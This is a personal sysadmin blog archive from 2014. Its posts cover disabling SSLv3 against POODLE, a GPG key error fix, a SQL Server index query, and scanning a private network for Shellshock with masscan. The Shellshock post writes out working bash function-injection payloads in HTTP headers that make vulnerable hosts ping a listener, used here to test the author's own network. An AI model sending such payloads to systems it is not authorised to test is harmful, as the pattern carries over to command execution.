Scan your site for POODLE vulnerability

Posted on November 23, 2014 by admin

This site works really well. I highly recommend it.

https://www.tinfoilsecurity.com/poodle

Posted in SSL | Comments Off on Scan your site for POODLE vulnerability

How to disable SSL3 in Nginx and Apache to prevent POODLE

Posted on October 16, 2014 by admin

Here is how to disable SSLv3 in apache and nginx.

Just for fun, before you do it, scan your site with this tool:
https://www.tinfoilsecurity.com/poodle

Qualys SSL Server Test (this one is much better. tinfoilhat was the first one i found that found poodle)

In apache, add to your apache config apache2.conf or security.conf:


SSLProtocol all -SSLv2 -SSLv3

In Nginx, add this to your HTTP block:


ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Now use https://www.tinfoilsecurity.com/poodle to scan it again.

done.

Posted in Linux, nginx, SSL | Comments Off on How to disable SSL3 in Nginx and Apache to prevent POODLE

How to scan for shellshock

Posted on September 24, 2014 by admin


cd /root
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make

then copied this into a file shellshock.conf


range = 172.16.1.1-172.16.1.254
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 172.16.1.217
http-header = Host:() { :; }; ping -c 3 172.16.1.217
http-header = Referer:() { :; }; ping -c 3 172.16.1.217

Then I ssh’ed to 172.16.1.217 and added this to my /etc/iptables.rules file


-N LOGGING
-A LOGGING -m limit --limit 200/min -j LOG --log-prefix "SHELLSHOCK: " --log-level 7
-A LOGGING -j RETURN
-A INPUT -s 172.16.1.0/24 -p icmp --icmp-type echo-request -j LOGGING

I tested by pinging it, and it logged.

then ran /root/masscan/bin/masscan -c shellshock.conf

Posted in Linux | Comments Off on How to scan for shellshock

GPG error NO_PUBKEY

Posted on August 26, 2014 by admin

I am getting

W: GPG error: http:// archive.canonical.com quantal Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 40976EAF437D05B5 NO_PUBKEY 3B4FE6ACC0B21F32

The fix:

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 40976EAF437D05B5
Posted in Uncategorized | Comments Off on GPG error NO_PUBKEY

How to find missing indexes in SQL Server

Posted on August 14, 2014 by admin

This works in SQL Server 2005 or better.

SELECT * FROM sys.dm_db_missing_index_details

Too easy!

See this link for more information.

Posted in Microsoft | Comments Off on How to find missing indexes in SQL Server